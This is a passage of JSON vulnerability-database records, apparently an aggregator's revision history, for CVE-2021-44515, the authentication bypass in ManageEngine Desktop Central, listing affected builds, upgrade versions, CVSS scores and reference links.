"zohocorp:manageengine_desktop_central", "version": "10.1.2137.3", "operator": "lt", "name": "zohocorp manageengine desktop central"}, {"cpeName": "zohocorp:manageengine_desktop_central", "version": "10.1.2137.3", "operator": "le", "name": "zohocorp manageengine desktop central"}], "affectedConfiguration": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"operator": "OR", "children": [], "cpe_match": [{"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_desktop_central:10.1.2127.18:*:*:*:enterprise:*:*:*", "versionEndExcluding": "10.1.2127.18", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_desktop_central:10.1.2127.18:*:*:*:managed_service_providers:*:*:*", "versionEndExcluding": "10.1.2127.18", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_desktop_central:10.1.2137.3:*:*:*:managed_service_providers:*:*:*", "versionStartIncluding": "10.1.2128.0", "versionEndExcluding": "10.1.2137.3", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_desktop_central:10.1.2137.3:*:*:*:enterprise:*:*:*", "versionStartIncluding": "10.1.2128.0", "versionEndIncluding": "10.1.2137.3", "cpe_name": []}]}]}, "extraReferences": [{"url": "https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp", "name": "https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp", "refsource": "CONFIRM", "tags": ["Issue Tracking", "Vendor Advisory"]}, {"url": "https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog", "name": "https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog", "refsource": "MISC", "tags": ["Third Party Advisory", "US Government Resource"]}, {"url": "https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html", "name": "https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html", "refsource": "CONFIRM", "tags": ["Exploit", "Patch", "Vendor Advisory"]}]}, "lastseen": "2021-12-16T22:55:33", "differentElements": ["affectedSoftware", "cpe", "cpe23", "cpeConfiguration", "cvss", "cvss2", "cvss3", "cwe", "extraReferences", "modified"], "edition": 23}, {"bulletin": {"id": "CVE-2021-44515", "vendorId": null, "hash": "68d9bafd6b120bb5f87bb11033a1b946", "type": "cve", "bulletinFamily": "NVD", "title": "CVE-2021-44515", "description": "Zoho ManageEngine Desktop Central is vulnerable to authentication bypass, leading to remote code execution on the server, as exploited in the wild in December 2021. For Enterprise builds 10.1.2127.17 and earlier, upgrade to 10.1.2127.18. For Enterprise builds 10.1.2128.0 through 10.1.2137.2, upgrade to 10.1.2137.3. For MSP builds 10.1.2127.17 and earlier, upgrade to 10.1.2127.18. For MSP builds 10.1.2128.0 through 10.1.2137.2, upgrade to 10.1.2137.3.", "published": "2021-12-12T05:15:00", "modified": "2021-12-13T13:01:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-44515", "reporter": "cve@mitre.org", "references": ["https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp", "https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog", "https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html"], "cvelist": ["CVE-2021-44515"], "immutableFields": [], "lastseen": "2021-12-16T22:55:44", "history": [], "viewCount": 24, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:691FE896-C4DF-492A-BF1B-2E720F24CB12"]}, {"type": "nessus", "idList": ["MANAGEENGINE_DESKTOP_CENTRAL_10_1_2137_3.NASL"]}, {"type": "cisa", "idList": ["CISA:C9AC32BB051B58B7F0F6E0FD2949390C", "CISA:380E63A9EAAD85FA1950A6973017E11B"]}, {"type": "thn", "idList": ["THN:DB8E18C57AFB9EEEFDABD840FBF5D938"]}, {"type": "hivepro", "idList": ["HIVEPRO:C7C4C4FD6D71992EA2AF88F0ECFBD280"]}], "modified": "2021-12-14T08:36:42", "rev": 2}, "exploitation": {"wildExploited": true, "wildExploitedSources": [{"type": "attackerkb", "idList": ["AKB:691FE896-C4DF-492A-BF1B-2E720F24CB12"]}], "modified": "2021-12-16T22:55:44"}, "score": {"value": 2.7, "vector": "NONE", "modified": "2021-12-14T08:36:42", "rev": 2}, "twitter": {"counter": 4, "tweets": [{"link": "https://twitter.com/Lori_Riot/status/1471474954134642688", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "Lori_Riot", "author_photo": "https://pbs.twimg.com/profile_images/2381472445/zion16wiwipcdmjk8xzy_400x400.jpeg"}, {"link": "https://twitter.com/Lori_Riot/status/1471474954134642688", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "Lori_Riot", "author_photo": "https://pbs.twimg.com/profile_images/2381472445/zion16wiwipcdmjk8xzy_400x400.jpeg"}, {"link": "https://twitter.com/NickBla41002745/status/1471476498359939072", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "NickBla41002745", "author_photo": "https://pbs.twimg.com/profile_images/1376419447519469571/R45gBpEc_400x400.jpg"}, {"link": "https://twitter.com/NickBla41002745/status/1471476498359939072", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "NickBla41002745", "author_photo": "https://pbs.twimg.com/profile_images/1376419447519469571/R45gBpEc_400x400.jpg"}], "modified": "2021-12-14T08:36:42"}}, "objectVersion": "1.6", "cpe": [], "cpe23": [], "cwe": [], "affectedSoftware": [], "affectedConfiguration": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": []}, "extraReferences": [{"url": "https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp", "name": "https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp", "refsource": "CONFIRM", "tags": []}, {"url": "https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog", "name": "https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog", "refsource": "MISC", "tags": []}, {"url": "https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html", "name": "https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html", "refsource": "CONFIRM", "tags": []}]}, "lastseen": "2021-12-16T22:55:44", "differentElements": ["affectedSoftware", "cpe", "cpe23", "cpeConfiguration", "cvss", "cvss2", "cvss3", "cwe", "extraReferences", "modified"], "edition": 24}, {"bulletin": {"id": "CVE-2021-44515", "vendorId": null, "hash": "ef3259d039a75fd744dba86cda6e391a", "type": "cve", "bulletinFamily": "NVD", "title": "CVE-2021-44515", "description": "Zoho ManageEngine Desktop Central is vulnerable to authentication bypass, leading to remote code execution on the server, as exploited in the wild in December 2021. For Enterprise builds 10.1.2127.17 and earlier, upgrade to 10.1.2127.18. For Enterprise builds 10.1.2128.0 through 10.1.2137.2, upgrade to 10.1.2137.3. For MSP builds 10.1.2127.17 and earlier, upgrade to 10.1.2127.18. For MSP builds 10.1.2128.0 through 10.1.2137.2, upgrade to 10.1.2137.3.", "published": "2021-12-12T05:15:00", "modified": "2021-12-16T14:16:00", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "baseScore": 10.0}, "severity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-44515", "reporter": "cve@mitre.org", "references": ["https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp", "https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog", "https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html"], "cvelist": ["CVE-2021-44515"], "immutableFields": [], "lastseen": "2021-12-16T23:25:33", "history": [], "viewCount": 24, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:691FE896-C4DF-492A-BF1B-2E720F24CB12"]}, {"type": "nessus", "idList": ["MANAGEENGINE_DESKTOP_CENTRAL_10_1_2137_3.NASL"]}, {"type": "cisa", "idList": ["CISA:C9AC32BB051B58B7F0F6E0FD2949390C", "CISA:380E63A9EAAD85FA1950A6973017E11B"]}, {"type": "thn", "idList": ["THN:DB8E18C57AFB9EEEFDABD840FBF5D938"]}, {"type": "hivepro", "idList": ["HIVEPRO:C7C4C4FD6D71992EA2AF88F0ECFBD280"]}], "modified": "2021-12-14T08:36:42", "rev": 2}, "exploitation": {"wildExploited": true, "wildExploitedSources": [{"type": "attackerkb", "idList": ["AKB:691FE896-C4DF-492A-BF1B-2E720F24CB12"]}], "modified": "2021-12-16T22:55:44"}, "score": {"value": 2.7, "vector": "NONE", "modified": "2021-12-14T08:36:42", "rev": 2}, "twitter": {"counter": 4, "tweets": [{"link": "https://twitter.com/Lori_Riot/status/1471474954134642688", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "Lori_Riot", "author_photo": "https://pbs.twimg.com/profile_images/2381472445/zion16wiwipcdmjk8xzy_400x400.jpeg"}, {"link": "https://twitter.com/Lori_Riot/status/1471474954134642688", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "Lori_Riot", "author_photo": "https://pbs.twimg.com/profile_images/2381472445/zion16wiwipcdmjk8xzy_400x400.jpeg"}, {"link": "https://twitter.com/NickBla41002745/status/1471476498359939072", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "NickBla41002745", "author_photo": "https://pbs.twimg.com/profile_images/1376419447519469571/R45gBpEc_400x400.jpg"}, {"link": "https://twitter.com/NickBla41002745/status/1471476498359939072", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "NickBla41002745", "author_photo": "https://pbs.twimg.com/profile_images/1376419447519469571/R45gBpEc_400x400.jpg"}], "modified": "2021-12-14T08:36:42"}}, "objectVersion": "1.6", "cpe": ["cpe:/a:zohocorp:manageengine_desktop_central:10.1.2137.3"], "cpe23": ["cpe:2.3:a:zohocorp:manageengine_desktop_central:10.1.2137.3:*:*:*:enterprise:*:*:*"], "cwe": ["CWE-287"], "affectedSoftware": [{"cpeName": "zohocorp:manageengine_desktop_central", "version": "10.1.2127.18", "operator": "lt", "name": "zohocorp manageengine desktop central"}, {"cpeName": "zohocorp:manageengine_desktop_central", "version": "10.1.2127.18", "operator": "lt", "name": "zohocorp manageengine desktop central"}, {"cpeName": "zohocorp:manageengine_desktop_central", "version": "10.1.2137.3", "operator": "lt", "name": "zohocorp manageengine desktop central"}, {"cpeName": "zohocorp:manageengine_desktop_central", "version": "10.1.2137.3", "operator": "le", "name": "zohocorp manageengine desktop central"}], "affectedConfiguration": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"operator": "OR", "children": [], "cpe_match": [{"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_desktop_central:10.1.2127.18:*:*:*:enterprise:*:*:*", "versionEndExcluding": "10.1.2127.18", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_desktop_central:10.1.2127.18:*:*:*:managed_service_providers:*:*:*", "versionEndExcluding": "10.1.2127.18", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_desktop_central:10.1.2137.3:*:*:*:managed_service_providers:*:*:*", "versionStartIncluding": "10.1.2128.0", "versionEndExcluding": "10.1.2137.3", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_desktop_central:10.1.2137.3:*:*:*:enterprise:*:*:*", "versionStartIncluding": "10.1.2128.0", "versionEndIncluding": "10.1.2137.3", "cpe_name": []}]}]}, "extraReferences": [{"url": "https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp", "name": "https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp", "refsource": "CONFIRM", "tags": ["Issue Tracking", "Vendor Advisory"]}, {"url": "https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog", "name": "https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog", "refsource": "MISC", "tags": ["Third Party Advisory", "US Government Resource"]}, {"url": "https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html", "name": "https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html", "refsource": "CONFIRM", "tags": ["Exploit", "Patch", "Vendor Advisory"]}]}, "lastseen": "2021-12-16T23:25:33", "differentElements": ["affectedSoftware", "cpe", "cpe23", "cpeConfiguration", "cvss", "cvss2", "cvss3", "cwe", "extraReferences", "modified"], "edition": 25}, {"bulletin": {"id": "CVE-2021-44515", "vendorId": null, "hash": "68d9bafd6b120bb5f87bb11033a1b946", "type": "cve", "bulletinFamily": "NVD", "title": "CVE-2021-44515", "description": "Zoho ManageEngine Desktop Central is vulnerable to authentication bypass, leading to remote code execution on the server, as exploited in the wild in December 2021. For Enterprise builds 10.1.2127.17 and earlier, upgrade to 10.1.2127.18. For Enterprise builds 10.1.2128.0 through 10.1.2137.2, upgrade to 10.1.2137.3. For MSP builds 10.1.2127.17 and earlier, upgrade to 10.1.2127.18. For MSP builds 10.1.2128.0 through 10.1.2137.2, upgrade to 10.1.2137.3.", "published": "2021-12-12T05:15:00", "modified": "2021-12-13T13:01:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-44515", "reporter": "cve@mitre.org", "references": ["https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp", "https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog", "https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html"], "cvelist": ["CVE-2021-44515"], "immutableFields": [], "lastseen": "2021-12-16T23:25:43", "history": [], "viewCount": 24, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:691FE896-C4DF-492A-BF1B-2E720F24CB12"]}, {"type": "nessus", "idList": ["MANAGEENGINE_DESKTOP_CENTRAL_10_1_2137_3.NASL"]}, {"type": "cisa", "idList": ["CISA:C9AC32BB051B58B7F0F6E0FD2949390C", "CISA:380E63A9EAAD85FA1950A6973017E11B"]}, {"type": "thn", "idList": ["THN:DB8E18C57AFB9EEEFDABD840FBF5D938"]}, {"type": "hivepro", "idList": ["HIVEPRO:C7C4C4FD6D71992EA2AF88F0ECFBD280"]}], "modified": "2021-12-14T08:36:42", "rev": 2}, "exploitation": {"wildExploited": true, "wildExploitedSources": [{"type": "attackerkb", "idList": ["AKB:691FE896-C4DF-492A-BF1B-2E720F24CB12"]}], "modified": "2021-12-16T23:25:43"}, "score": {"value": 2.7, "vector": "NONE", "modified": "2021-12-14T08:36:42", "rev": 2}, "twitter": {"counter": 4, "tweets": [{"link": "https://twitter.com/Lori_Riot/status/1471474954134642688", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "Lori_Riot", "author_photo": "https://pbs.twimg.com/profile_images/2381472445/zion16wiwipcdmjk8xzy_400x400.jpeg"}, {"link": "https://twitter.com/Lori_Riot/status/1471474954134642688", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "Lori_Riot", "author_photo": "https://pbs.twimg.com/profile_images/2381472445/zion16wiwipcdmjk8xzy_400x400.jpeg"}, {"link": "https://twitter.com/NickBla41002745/status/1471476498359939072", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "NickBla41002745", "author_photo": "https://pbs.twimg.com/profile_images/1376419447519469571/R45gBpEc_400x400.jpg"}, {"link": "https://twitter.com/NickBla41002745/status/1471476498359939072", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "NickBla41002745", "author_photo": "https://pbs.twimg.com/profile_images/1376419447519469571/R45gBpEc_400x400.jpg"}], "modified": "2021-12-14T08:36:42"}}, "objectVersion": "1.6", "cpe": [], "cpe23": [], "cwe": [], "affectedSoftware": [], "affectedConfiguration": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": []}, "extraReferences": [{"url": "https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp", "name": "https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp", "refsource": "CONFIRM", "tags": []}, {"url": "https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog", "name": "https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog", "refsource": "MISC", "tags": []}, {"url": "https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html", "name": "https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html", "refsource": "CONFIRM", "tags": []}]}, "lastseen": "2021-12-16T23:25:43", "differentElements": ["affectedSoftware", "cpe", "cpe23", "cpeConfiguration", "cvss", "cvss2", "cvss3", "cwe", "extraReferences", "modified"], "edition": 26}, {"bulletin": {"id": "CVE-2021-44515", "vendorId": null, "hash": "ef3259d039a75fd744dba86cda6e391a", "type": "cve", "bulletinFamily": "NVD", "title": "CVE-2021-44515", "description": "Zoho ManageEngine Desktop Central is vulnerable to authentication bypass, leading to remote code execution on the server, as exploited in the wild in December 2021. For Enterprise builds 10.1.2127.17 and earlier, upgrade to 10.1.2127.18. For Enterprise builds 10.1.2128.0 through 10.1.2137.2, upgrade to 10.1.2137.3. For MSP builds 10.1.2127.17 and earlier, upgrade to 10.1.2127.18. For MSP builds 10.1.2128.0 through 10.1.2137.2, upgrade to 10.1.2137.3.", "published": "2021-12-12T05:15:00", "modified": "2021-12-16T14:16:00", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "baseScore": 10.0}, "severity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-44515", "reporter": "cve@mitre.org", "references": ["https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp", "https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog", "https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html"], "cvelist": ["CVE-2021-44515"], "immutableFields": [], "lastseen": "2021-12-16T23:35:58", "history": [], "viewCount": 24, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:691FE896-C4DF-492A-BF1B-2E720F24CB12"]}, {"type": "nessus", "idList": ["MANAGEENGINE_DESKTOP_CENTRAL_10_1_2137_3.NASL"]}, {"type": "cisa", "idList": ["CISA:C9AC32BB051B58B7F0F6E0FD2949390C", "CISA:380E63A9EAAD85FA1950A6973017E11B"]}, {"type": "thn", "idList": ["THN:DB8E18C57AFB9EEEFDABD840FBF5D938"]}, {"type": "hivepro", "idList": ["HIVEPRO:C7C4C4FD6D71992EA2AF88F0ECFBD280"]}], "modified": "2021-12-14T08:36:42", "rev": 2}, "exploitation": {"wildExploited": true, "wildExploitedSources": [{"type": "attackerkb", "idList": ["AKB:691FE896-C4DF-492A-BF1B-2E720F24CB12"]}], "modified": "2021-12-16T23:25:43"}, "score": {"value": 2.7, "vector": "NONE", "modified": "2021-12-14T08:36:42", "rev": 2}, "twitter": {"counter": 4, "tweets": [{"link": "https://twitter.com/Lori_Riot/status/1471474954134642688", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "Lori_Riot", "author_photo": "https://pbs.twimg.com/profile_images/2381472445/zion16wiwipcdmjk8xzy_400x400.jpeg"}, {"link": "https://twitter.com/Lori_Riot/status/1471474954134642688", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "Lori_Riot", "author_photo": "https://pbs.twimg.com/profile_images/2381472445/zion16wiwipcdmjk8xzy_400x400.jpeg"}, {"link": "https://twitter.com/NickBla41002745/status/1471476498359939072", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "NickBla41002745", "author_photo": "https://pbs.twimg.com/profile_images/1376419447519469571/R45gBpEc_400x400.jpg"}, {"link": "https://twitter.com/NickBla41002745/status/1471476498359939072", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "NickBla41002745", "author_photo": "https://pbs.twimg.com/profile_images/1376419447519469571/R45gBpEc_400x400.jpg"}], "modified": "2021-12-14T08:36:42"}}, "objectVersion": "1.6", "cpe": ["cpe:/a:zohocorp:manageengine_desktop_central:10.1.2137.3"], "cpe23": ["cpe:2.3:a:zohocorp:manageengine_desktop_central:10.1.2137.3:*:*:*:enterprise:*:*:*"], "cwe": ["CWE-287"], "affectedSoftware": [{"cpeName": "zohocorp:manageengine_desktop_central", "version": "10.1.2127.18", "operator": "lt", "name": "zohocorp manageengine desktop central"}, {"cpeName": "zohocorp:manageengine_desktop_central", "version": "10.1.2127.18", "operator": "lt", "name": "zohocorp manageengine desktop central"}, {"cpeName": "zohocorp:manageengine_desktop_central", "version": "10.1.2137.3", "operator": "lt", "name": "zohocorp manageengine desktop central"}, {"cpeName": "zohocorp:manageengine_desktop_central", "version": "10.1.2137.3", "operator": "le", "name": "zohocorp manageengine desktop central"}], "affectedConfiguration": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"operator": "OR", "children": [], "cpe_match": [{"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_desktop_central:10.1.2127.18:*:*:*:enterprise:*:*:*", "versionEndExcluding": "10.1.2127.18", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_desktop_central:10.1.2127.18:*:*:*:managed_service_providers:*:*:*", "versionEndExcluding": "10.1.2127.18", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_desktop_central:10.1.2137.3:*:*:*:managed_service_providers:*:*:*", "versionStartIncluding": "10.1.2128.0", "versionEndExcluding": "10.1.2137.3", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_desktop_central:10.1.2137.3:*:*:*:enterprise:*:*:*", "versionStartIncluding": "10.1.2128.0", "versionEndIncluding": "10.1.2137.3", "cpe_name": []}]}]}, "extraReferences": [{"url": "https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp", "name": "https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp", "refsource": "CONFIRM", "tags": ["Issue Tracking", "Vendor Advisory"]}, {"url": "https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog", "name": "https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog", "refsource": "MISC", "tags": ["Third Party Advisory", "US Government Resource"]}, {"url": "https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html", "name": "https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html", "refsource": "CONFIRM", "tags": ["Exploit", "Patch", "Vendor Advisory"]}]}, "lastseen": "2021-12-16T23:35:58", "differentElements": ["affectedSoftware", "cpe", "cpe23", "cpeConfiguration", "cvss", "cvss2", "cvss3", "cwe", "extraReferences", "modified"], "edition": 27}, {"bulletin": {"id": "CVE-2021-44515", "vendorId": null, "hash": "68d9bafd6b120bb5f87bb11033a1b946", "type": "cve", "bulletinFamily": "NVD", "title": "CVE-2021-44515", "description": "Zoho ManageEngine Desktop Central is vulnerable to authentication bypass, leading to remote code execution on the server, as exploited in the wild in December 2021. For Enterprise builds 10.1.2127.17 and earlier, upgrade to 10.1.2127.18. For Enterprise builds 10.1.2128.0 through 10.1.2137.2, upgrade to 10.1.2137.3. For MSP builds 10.1.2127.17 and earlier, upgrade to 10.1.2127.18. For MSP builds 10.1.2128.0 through 10.1.2137.2, upgrade to 10.1.2137.3.", "published": "2021-12-12T05:15:00", "modified": "2021-12-13T13:01:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-44515", "reporter": "cve@mitre.org", "references": ["https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp", "https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog", "https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html"], "cvelist": ["CVE-2021-44515"], "immutableFields": [], "lastseen": "2021-12-16T23:56:45", "history": [], "viewCount": 24, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:691FE896-C4DF-492A-BF1B-2E720F24CB12"]}, {"type": "nessus", "idList": ["MANAGEENGINE_DESKTOP_CENTRAL_10_1_2137_3.NASL"]}, {"type": "cisa", "idList": ["CISA:C9AC32BB051B58B7F0F6E0FD2949390C", "CISA:380E63A9EAAD85FA1950A6973017E11B"]}, {"type": "thn", "idList": ["THN:DB8E18C57AFB9EEEFDABD840FBF5D938"]}, {"type": "hivepro", "idList": ["HIVEPRO:C7C4C4FD6D71992EA2AF88F0ECFBD280"]}], "modified": "2021-12-14T08:36:42", "rev": 2}, "exploitation": {"wildExploited": true, 